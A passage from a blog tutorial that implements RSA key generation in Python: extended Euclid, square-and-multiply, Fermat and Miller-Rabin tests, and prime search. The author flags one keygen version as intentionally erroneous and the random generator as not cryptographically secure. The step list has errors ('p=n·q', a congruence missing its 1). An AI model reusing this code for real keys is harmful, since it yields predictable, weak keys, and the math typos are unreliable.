<span class="sd"> Source: https://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm</span>
<span class="sd"> Extended Euclidean Algorithm (EEA)</span>
<span class="sd"> Parameters: Positive integers a and b whereby a > b</span>
<span class="sd"> Returns: ( gcd(a,b), s, t ) such that gcd(a,b) = s*a + t*b</span>
<span class="sd"> """</span>
<span class="k">assert</span> <span class="n">a</span> <span class="o">></span> <span class="n">b</span><span class="p">,</span> <span class="s1">'a must be larger than b'</span>
<span class="n">x0</span><span class="p">,</span> <span class="n">x1</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span>
<span class="k">while</span> <span class="n">a</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">q</span><span class="p">,</span> <span class="n">b</span><span class="p">,</span> <span class="n">a</span> <span class="o">=</span> <span class="n">b</span> <span class="o">//</span> <span class="n">a</span><span class="p">,</span> <span class="n">a</span><span class="p">,</span> <span class="n">b</span> <span class="o">%</span> <span class="n">a</span>
<span class="n">x0</span><span class="p">,</span> <span class="n">x1</span> <span class="o">=</span> <span class="n">x1</span><span class="p">,</span> <span class="n">x0</span> <span class="o">-</span> <span class="n">q</span> <span class="o">*</span> <span class="n">x1</span>
<span class="n">y0</span><span class="p">,</span> <span class="n">y1</span> <span class="o">=</span> <span class="n">y1</span><span class="p">,</span> <span class="n">y0</span> <span class="o">-</span> <span class="n">q</span> <span class="o">*</span> <span class="n">y1</span>
<span class="k">return</span> <span class="n">b</span><span class="p">,</span> <span class="n">y0</span><span class="p">,</span> <span class="n">x0</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="nb">print</span> <span class="p">(</span> <span class="n">egcd</span><span class="p">(</span> <span class="mi">30</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="p">)</span>
<span class="nb">print</span> <span class="p">(</span> <span class="n">egcd</span><span class="p">(</span> <span class="mi">17</span><span class="p">,</span> <span class="mi">5</span><span class="p">)</span> <span class="p">)</span>
<span class="nb">print</span> <span class="p">(</span> <span class="n">egcd</span><span class="p">(</span> <span class="mi">234232</span><span class="p">,</span> <span class="mi">774</span><span class="p">)</span> <span class="p">)</span>
</code></pre></div>
<h4>Square and Multiply Algorithm</h4>
<p>As we have seen in the RSA encryption and decryption function, we need to calculate huge exponents with bitlengths of at least <span class="math">\(1024\)</span>. This computation is done efficiently with the square and multiply algorithm illustrated below. When an optional modulus <span class="math">\(p\)</span> is supplied, the modulus exponentiation is computed. The square and multiply algorithm is equivalent to the Python one-liner <code>pow(x, k, p)</code></p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">square_and_multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">p</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Square and Multiply Algorithm</span>
<span class="sd"> Parameters: positive integer x and integer exponent k,</span>
<span class="sd"> optional modulus p</span>
<span class="sd"> Returns: x**k or x**k mod p when p is given</span>
<span class="sd"> """</span>
<span class="n">b</span> <span class="o">=</span> <span class="nb">bin</span><span class="p">(</span><span class="n">k</span><span class="p">)</span><span class="o">.</span><span class="n">lstrip</span><span class="p">(</span><span class="s1">'0b'</span><span class="p">)</span>
<span class="n">r</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">b</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">r</span><span class="o">**</span><span class="mi">2</span>
<span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">'1'</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">r</span> <span class="o">*</span> <span class="n">x</span>
<span class="k">if</span> <span class="n">p</span><span class="p">:</span>
<span class="n">r</span> <span class="o">%=</span> <span class="n">p</span>
<span class="k">return</span> <span class="n">r</span>
</code></pre></div>
<h3>Practical Key Generation for RSA</h3>
<p>Now that we have established the necessary theory and algorithms for the key generation, we can implement the second part of the key generation algorithm. The first part, <strong>how to find large primes</strong>, will be left over as the main contribution of this article. For now, lets just assume that we already have a method to create large prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span>.</p>
<p>Therefore, we need to perform the steps 2. to 5. in the key generation process.</p>
<ol>
<li><span class="math">\(p=n \cdot q\)</span></li>
<li>Compute <span class="math">\(\phi(n) = (q-1) \cdot (p-1)\)</span></li>
<li>Choose a public exponent <span class="math">\(e \in \{1,2,...,\phi(n)-1\}\)</span> such that <div class="math">$$gcd(e, \phi(n)) = 1$$</div>
</li>
<li>Find the private key <span class="math">\(K_{private}=(d)\)</span> such that <div class="math">$$d \cdot e \equiv \pmod{\phi(n)}$$</div>
</li>
</ol>
<p>I implemented those steps in the Python code below. Please don't use this code since it is intentionally erroneous.</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">eea</span>
<span class="k">def</span> <span class="nf">RSA_keygen</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">q</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Perform steps 2. to 5. in the RSA Key Generation process.</span>
<span class="sd"> """</span>
<span class="c1"># step 2</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
<span class="c1"># step 3</span>
<span class="n">phi_n</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="c1"># step 4 and step 5</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">random</span><span class="o">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">phi_n</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">if</span> <span class="n">math</span><span class="o">.</span><span class="n">gcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi_n</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="c1"># step 5</span>
<span class="n">gcd</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">eea</span><span class="o">.</span><span class="n">EEA</span><span class="p">(</span><span class="n">phi_n</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span>
<span class="k">if</span> <span class="n">gcd</span> <span class="o">==</span> <span class="p">(</span><span class="n">s</span><span class="o">*</span><span class="n">phi_n</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">e</span><span class="p">):</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">t</span> <span class="o">%</span> <span class="n">phi_n</span>
<span class="k">break</span>
<span class="k">return</span> <span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">RSA_keygen</span><span class="p">(</span><span class="mi">53</span><span class="p">,</span> <span class="mi">179</span><span class="p">))</span>
</code></pre></div>
<h2>Generating large prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> for RSA</h2>
<p>Now that we completed all steps in the RSA key generation algorithm, we arrive at the last hurdle: How to find large prime numbers? The reader might suspect that the problem of determining whether a integer is a prime number is equally hard to the problem of factorization of a product of two primes. Of course, if we knew the factorization of a number, we could say whether this number is a prime or not. But do we need to factorize the numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> in order to make a statement about their primality? Luckily, the answer is no. Primality tests exist that are computationally much more efficient then the integer factorization algorithms. There are two different primality tests that can be used to make a assertion whether a number is a prime.</p>
<p>One is called <strong>Fermat Primality Test</strong> and the other is known as the <strong>Miller-Rabin Primality Test</strong>. Both tests work with probabilities. They either output <strong>"the number is a composite"</strong> or <strong>"the number is a prime"</strong>. While the first statement is always true, the second statement is only true with a certain probability. Therefore those algorithms are probabilistic algorithms, so called <strong>Monte Carlo Algorithms</strong>. They output a primality statement with configurable probability.</p>
<p>For using RSA, we should chose the prime numbers <span class="math">\(p\)</span> and <span class="math">\(q\)</span> to have equal bit-lengths. So if we want RSA to run with a <span class="math">\(n\)</span> of 1024 bits, <span class="math">\(p\)</span> and <span class="math">\(q\)</span> should have a length of roughly <span class="math">\(2^{512}\)</span>. But how can we be certain that there even exist prime numbers in those high ranges?</p>
<p>The <a href="https://en.wikipedia.org/wiki/Prime_number_theorem">prime number theorem</a> states that the probability that a random integer <span class="math">\(k\)</span> is prime is <span class="math">\(P(k\text{ is a prime}) \approx \frac{1}{ln(k)}\)</span>. This follows from the main statement of the theorem, that prime numbers are asymptotically distributed among postive integers. This essentially means that the likelihood of a number being prime decreases slowly, the bigger the numbers get. The prime counting function <span class="math">\(\pi(x)\)</span> gives the number of primes less or equal to the real number <span class="math">\(x\)</span>. The theorem states that the prime counting function is approximately </p>
<div class="math">$$\pi(x) \approx \frac{x}{ln(x)}$$</div>
<p>So the probability that a random integer with bitlength 512 is a prime is roughly </p>
<div class="math">$$P(2^{512} \text{ is prime}) \approx \frac{2}{ln(2^{512})} \approx \frac{2}{512 \cdot ln(2)} \approx \frac{1}{177}$$</div>
<p>
which is a sufficiently high probability to <strong>just randomly try out some odd numbers</strong> and check them with the before-mentioned primality tests. Of course this process of randomly generating integer candidates shouldn't follow any deterministic logic. Otherwise an attacker could just replay the number generating process to find the primes that were used with RSA.</p>
<h3>Fermat Primality Test</h3>
<p>We will not use the Fermat Primality Test, because it is not used in practice. We however quickly explain how this test works. This test is based on <strong>Fermats Little Theorem</strong>, which states that for any integer <span class="math">\(a\)</span> and prime number <span class="math">\(p\)</span> the following congruence holds: </p>
<div class="math">$$a^{p-1} \equiv 1 \pmod p$$</div>
<p>The Fermant Primality Test implemented in Python looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="k">def</span> <span class="nf">fermat_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> a^(p-1) ≡ 1 mod p</span>
<span class="sd"> Input: prime candidate p and security paramter s</span>
<span class="sd"> Output: either p is a composite (always trues), or</span>
<span class="sd"> p is a prime (with probability)</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="n">p</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">:</span> <span class="c1"># if p is even, number cant be a prime</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
<span class="n">x</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="c1"># a**(p-1) % p</span>
<span class="k">if</span> <span class="n">x</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
</code></pre></div>
<p>We will not use the Fermat Primality Test, since the test recognizes so called <a href="https://en.wikipedia.org/wiki/Carmichael_number">Carmichael Numbers</a> as false positives. The test detects them as primes, even though they are pseudo primes (composites). Those numbers satisfy Fermats Little theorem above even though they are composite. For this reason, we are going to use a better Primality test, <strong>the Miller-Rabin Test</strong>.</p>
<h3>Miller-Rabin Primality Test</h3>
<p>The Miller-Rabin Primality Test does not suffer from the limitations of the Fermat Primality Test. The test is based on the following mathematical observations. Every odd prime candidate <span class="math">\(\hat p\)</span> can be decomposed into the form </p>
<div class="math">$$\hat p - 1 = 2^u \cdot r$$</div>
<p> where <span class="math">\(r\)</span> is an odd integer. Lets say <span class="math">\(\hat p = 12162881\)</span>, then we can write <span class="math">\(\hat p-1\)</span> in binary form </p>
<div class="math">$$bin(\hat p-1)_2 = 101110011001011101000000$$</div>
<p> The six zeroes on the right of the binary representation is the <span class="math">\(2^u\)</span> part and the rest <span class="math">\(101110011001011101_2 = 190045\)</span> is the odd <span class="math">\(r\)</span> part. So, </p>
<div class="math">$$\hat p-1 = 2^6 \cdot 190045 = 12162880$$</div>
<p>We learn that we can write any integer odd integer in the form <span class="math">\(\hat p - 1 = 2^u \cdot r\)</span>. Now if we can find an integer <span class="math">\(a\)</span> such that </p>
<div class="math">$$a^r \not\equiv 1 \text{ mod } \hat p$$</div>
<p> and </p>
<div class="math">$$a^{r2^{k}} \not\equiv \hat p-1 \text{ mod } \hat p$$</div>
<p> for all <span class="math">\(k \in \{0,1,...,u-1\}\)</span>, then <span class="math">\(\hat p\)</span> is composite. Otherwise it is likely a prime number. This is the Miller-Rabin Primality test.</p>
<p>The program below implements the Miller-Rabin Primality test. The function runs with acceptable speed and manages to find prime numbers with bitlengths of 2048 and above. I tested the primes on wolfram alpha to make sure that the generated numbers are in fact prime numbers. It took me 11 seconds to create a prime number with bitlength 2048 on my laptop, which is an acceptable bitlength in RSA practice. The random number generator however is not cryptographically secure and your probably should not make use of this prime number generator in your crypto library.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="sd">"""</span>
<span class="sd">Generate prime numbers with the Miller-Rabin Primality Test.</span>
<span class="sd">For example useful for RSA prime number generation.</span>
<span class="sd">Generating a 2048 Bit Prime takes 11 seconds on my laptop:</span>
<span class="sd"> $ time python generate_primes.py</span>
<span class="sd"> 18687035979164759960466760296206931684048670365627731168581812017856988830965115380270770738787389085718116283127416689537626499398221423941864131345832239438016468120676003896789194409913408615320990238865137075670115908902303929614757662667625835901714318363069492532318855874659498625458479795852690370922508203783115512849318748971370018698508809310655527728638519173556845950918379394995191185954569447143685450657088230510827375976211180471624026433253567874110992844598001397299587423215893037362024063057346321319865682948169846512354337641419160496824946523484362125933347273900485920490790844892064041256141 is prime with bitlength=2048</span>
<span class="sd"> real 0m11.099s</span>
<span class="sd"> user 0m11.068s</span>
<span class="sd"> sys 0m0.020s</span>
<span class="sd">"""</span>
<span class="k">def</span> <span class="nf">fermat_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> a^(p-1) ≡ 1 mod p</span>
<span class="sd"> Input: prime candidate p and security paramter s</span>
<span class="sd"> Output: either p is a composite (always trues), or</span>
<span class="sd"> p is a prime (with probability)</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="n">p</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">:</span> <span class="c1"># if p is even, number cant be a prime</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
<span class="n">x</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span> <span class="c1"># a**(p-1) % p</span>
<span class="k">if</span> <span class="n">x</span> <span class="o">!=</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">square_and_multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">p</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Square and Multiply Algorithm</span>
<span class="sd"> Parameters: positive integer x and integer exponent k,</span>
<span class="sd"> optional modulus p</span>
<span class="sd"> Returns: x**k or x**k mod p when p is given</span>
<span class="sd"> """</span>
<span class="n">b</span> <span class="o">=</span> <span class="nb">bin</span><span class="p">(</span><span class="n">k</span><span class="p">)</span><span class="o">.</span><span class="n">lstrip</span><span class="p">(</span><span class="s1">'0b'</span><span class="p">)</span>
<span class="n">r</span> <span class="o">=</span> <span class="mi">1</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">b</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">r</span><span class="o">**</span><span class="mi">2</span>
<span class="k">if</span> <span class="n">i</span> <span class="o">==</span> <span class="s1">'1'</span><span class="p">:</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">r</span> <span class="o">*</span> <span class="n">x</span>
<span class="k">if</span> <span class="n">p</span><span class="p">:</span>
<span class="n">r</span> <span class="o">%=</span> <span class="n">p</span>
<span class="k">return</span> <span class="n">r</span>
<span class="k">def</span> <span class="nf">miller_rabin_primality_test</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">5</span><span class="p">):</span>
<span class="k">if</span> <span class="n">p</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span> <span class="c1"># 2 is the only prime that is even</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="ow">not</span> <span class="p">(</span><span class="n">p</span> <span class="o">&</span> <span class="mi">1</span><span class="p">):</span> <span class="c1"># n is a even number and can't be prime</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">p1</span> <span class="o">=</span> <span class="n">p</span> <span class="o">-</span> <span class="mi">1</span>
<span class="n">u</span> <span class="o">=</span> <span class="mi">0</span>
<span class="n">r</span> <span class="o">=</span> <span class="n">p1</span> <span class="c1"># p-1 = 2**u * r</span>
<span class="k">while</span> <span class="n">r</span> <span class="o">%</span> <span class="mi">2</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
<span class="n">r</span> <span class="o">>>=</span> <span class="mi">1</span>
<span class="n">u</span> <span class="o">+=</span> <span class="mi">1</span>
<span class="c1"># at this stage p-1 = 2**u * r holds</span>
<span class="k">assert</span> <span class="n">p</span><span class="o">-</span><span class="mi">1</span> <span class="o">==</span> <span class="mi">2</span><span class="o">**</span><span class="n">u</span> <span class="o">*</span> <span class="n">r</span>
<span class="k">def</span> <span class="nf">witness</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Returns: True, if there is a witness that p is not prime.</span>
<span class="sd"> False, when p might be prime</span>
<span class="sd"> """</span>
<span class="n">z</span> <span class="o">=</span> <span class="n">square_and_multiply</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>
<span class="k">if</span> <span class="n">z</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">u</span><span class="p">):</span>
<span class="n">z</span> <span class="o">=</span> <span class="n">square_and_multiply</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="mi">2</span><span class="o">**</span><span class="n">i</span> <span class="o">*</span> <span class="n">r</span><span class="p">,</span> <span class="n">p</span><span class="p">)</span>
<span class="k">if</span> <span class="n">z</span> <span class="o">==</span> <span class="n">p1</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="n">p</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span>
<span class="k">if</span> <span class="n">witness</span><span class="p">(</span><span class="n">a</span><span class="p">):</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">512</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Generates prime numbers with bitlength n.</span>
<span class="sd"> Stops after the generation of k prime numbers.</span>
<span class="sd"> Caution: The numbers tested for primality start at</span>
<span class="sd"> a random place, but the tests are drawn with the integers</span>
<span class="sd"> following from the random start.</span>
<span class="sd"> """</span>
<span class="k">assert</span> <span class="n">k</span> <span class="o">></span> <span class="mi">0</span>
<span class="k">assert</span> <span class="n">n</span> <span class="o">></span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">n</span> <span class="o"><</span> <span class="mi">4096</span>
<span class="c1"># follows from the prime number theorem</span>
<span class="n">necessary_steps</span> <span class="o">=</span> <span class="n">math</span><span class="o">.</span><span class="n">floor</span><span class="p">(</span> <span class="n">math</span><span class="o">.</span><span class="n">log</span><span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="n">n</span><span class="p">)</span> <span class="o">/</span> <span class="mi">2</span> <span class="p">)</span>
<span class="c1"># get n random bits as our first number to test for primality</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="n">n</span><span class="p">)</span>
<span class="n">primes</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">while</span> <span class="n">k</span><span class="o">></span><span class="mi">0</span><span class="p">:</span>
<span class="k">if</span> <span class="n">miller_rabin_primality_test</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">s</span><span class="o">=</span><span class="mi">7</span><span class="p">):</span>
<span class="n">primes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>
<span class="n">k</span> <span class="o">=</span> <span class="n">k</span><span class="o">-</span><span class="mi">1</span>
<span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="o">+</span><span class="mi">1</span>
<span class="k">return</span> <span class="n">primes</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="n">n</span> <span class="o">=</span> <span class="mi">2048</span>
<span class="n">primes</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">)</span>
<span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">primes</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'</span><span class="si">{}</span><span class="s1"> is prime with bitlength=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">n</span><span class="p">))</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>Now we are finally capable to efficiently find large prime numbers and to complete the RSA Key Generation Algorithm. Below is the updated and fully working RSA Key Generation Algorithm. Below is the final RSA Key Generation Algorithm.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="kn">import</span> <span class="nn">eea</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="k">def</span> <span class="nf">RSA_keygen</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="mi">512</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Perform steps 1. to 5. in the RSA Key Generation process.</span>
<span class="sd"> """</span>
<span class="c1"># step 1</span>
<span class="kn">import</span> <span class="nn">generate_primes</span>
<span class="n">p</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="o">.</span><span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="n">q</span> <span class="o">=</span> <span class="n">generate_primes</span><span class="o">.</span><span class="n">generate_primes</span><span class="p">(</span><span class="n">n</span><span class="o">=</span><span class="n">n</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">1</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># step 2</span>
<span class="n">n</span> <span class="o">=</span> <span class="n">p</span> <span class="o">*</span> <span class="n">q</span>
<span class="c1"># step 3</span>
<span class="n">phi_n</span> <span class="o">=</span> <span class="p">(</span><span class="n">p</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="p">(</span><span class="n">q</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span>
<span class="c1"># step 4 and step 5</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">e</span> <span class="o">=</span> <span class="n">random</span><span class="o">.</span><span class="n">randrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">phi_n</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="k">if</span> <span class="n">math</span><span class="o">.</span><span class="n">gcd</span><span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">phi_n</span><span class="p">)</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="c1"># step 5</span>
<span class="n">gcd</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">t</span> <span class="o">=</span> <span class="n">eea</span><span class="o">.</span><span class="n">EEA</span><span class="p">(</span><span class="n">phi_n</span><span class="p">,</span> <span class="n">e</span><span class="p">)</span>
<span class="k">if</span> <span class="n">gcd</span> <span class="o">==</span> <span class="p">(</span><span class="n">s</span><span class="o">*</span><span class="n">phi_n</span> <span class="o">+</span> <span class="n">t</span><span class="o">*</span><span class="n">e</span><span class="p">):</span>
<span class="n">d</span> <span class="o">=</span> <span class="n">t</span> <span class="o">%</span> <span class="n">phi_n</span>
<span class="k">break</span>
<span class="k">return</span> <span class="p">(</span><span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="n">d</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">RSA_keygen</span><span class="p">())</span>
</code></pre></div>
<h2>Conclusion</h2>
<p>Creating large primes for the RSA cryptosystem is a matter of a 100 line Python Script. The only tools you need are some Algorithms from number theory and a textbook about Cryptography.</p>
<script type="text/javascript">if (!document.getElementById('mathjaxscript_pelican_#%@#$@#')) {
var align = "left",
indent = "0em",
linebreak = "false";
if (false) {
align = (screen.width < 768) ? "left" : align;
indent = (screen.width < 768) ? "0em" : indent;
linebreak = (screen.width < 768) ? 'true' : linebreak;
}
var mathjaxscript = document.createElement('script');
mathjaxscript.id = 'mathjaxscript_pelican_#%@#$@#';
mathjaxscript.type = 'text/javascript';
mathjaxscript.src = 'https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/latest.js?config=TeX-AMS-MML_HTMLorMML';
var configscript = document.createElement('script');
configscript.type = 'text/x-mathjax-config';
configscript[(window.opera ? "innerHTML" : "text")] =
"MathJax.Hub.Config({" +
" config: ['MMLorHTML.js']," +
" TeX: { extensions: ['AMSmath.js','AMSsymbols.js','noErrors.js','noUndefined.js'], equationNumbers: { autoNumber: 'none' } }," +
" jax: ['input/TeX','input/MathML','output/HTML-CSS']," +
" extensions: ['tex2jax.js','mml2jax.js','MathMenu.js','MathZoom.js']," +
" displayAlign: '"+ align +"'," +
" displayIndent: '"+ indent +"'," +
" showMathMenu: true," +
" messageStyle: 'normal'," +
" tex2jax: { " +
" inlineMath: [ ['\\\\(','\\\\)'] ], " +
" displayMath: [ ['$$','$$'] ]," +
" processEscapes: true," +
" preview: 'TeX'," +
" }, " +
" 'HTML-CSS': { " +
" availableFonts: ['STIX', 'TeX']," +
" preferredFont: 'STIX'," +
" styles: { '.MathJax_Display, .MathJax .mo, .MathJax .mi, .MathJax .mn': {color: 'black ! important'} }," +
" linebreaks: { automatic: "+ linebreak +", width: '90% container' }," +
" }, " +
"}); " +
"if ('default' !== 'default') {" +
